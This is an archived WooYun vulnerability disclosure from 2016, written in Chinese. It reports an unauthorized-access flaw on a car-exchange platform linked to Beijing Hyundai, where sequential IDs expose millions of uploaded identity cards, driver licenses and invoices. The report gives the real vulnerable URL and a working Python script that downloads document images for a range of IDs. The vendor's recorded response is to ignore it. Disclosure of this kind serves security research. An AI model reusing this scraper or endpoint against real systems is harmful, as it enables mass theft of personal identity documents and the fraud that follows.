破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

北京现代某平台可越权遍历所有用户上传证件(涉及几百万身份证件/行驶证件/发票/驾驶证等)

编号222602
Urlhttp://www.wooyun.org/bug.php?action=view&id=222602
漏洞状态漏洞已经通知厂商但是厂商忽略漏洞
漏洞标题北京现代某平台可越权遍历所有用户上传证件(涉及几百万身份证件/行驶证件/发票/驾驶证等)
漏洞类型未授权访问/权限绕过
厂商beijing-hyundai.com.cn
白帽子路人甲
提交日期2016-06-24 09:29:00
公开日期2016-06-29 09:34:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank15
厂商评级
厂商评rank0
漏洞简介
mark
漏洞细节

越权链接:

http://zhihuan.xd2sc.com/CarExapp/imagelist.aspx?id=1400012


ID处可遍历

QQ截图20160623223236.png


QQ截图20160623220143.png


测试了ID从1400000开始一直到5431133都还有数据,几百万的证件信息。
写了个批量脚本,随机找了100个id检测下

#!/usr/bin/env python
#-*- coding:utf-8 -*-
import urllib
import re
def getImg(id):
url = "http://zhihuan.xd2sc.com/CarExapp/imagelist.aspx?id=%s" %id
resp = urllib.urlopen(url)
imgurl = re.search(r'src = "(.*?)"', resp.read())
if imgurl.group(1) == "":
pass
else:
imgurl = "http://zhihuan.xd2sc.com/CarExapp/"+imgurl.group(1)
img = urllib.urlopen(imgurl).read()
with open(str(id)+".jpg",'wb') as fs:
fs.write(img)
if __name__ == '__main__':
for i in range(5000000,5000100):
getImg(i)


QQ截图20160623224439.png


POC

修复方案

控制权限

状态信息 2016-06-24: 细节已通知厂商并且等待厂商处理中
2016-06-24: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-29: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复None漏洞Rank:15 (WooYun评价)
回应信息危害等级:无影响厂商忽略忽略时间:2016-06-29 09:34
Showing 1-1 of 1 item.
评论内容评论人点赞数评论时间

还敢爬数据?信不信报警抓你,手动微笑

小小黑02016-06-29 09:51:00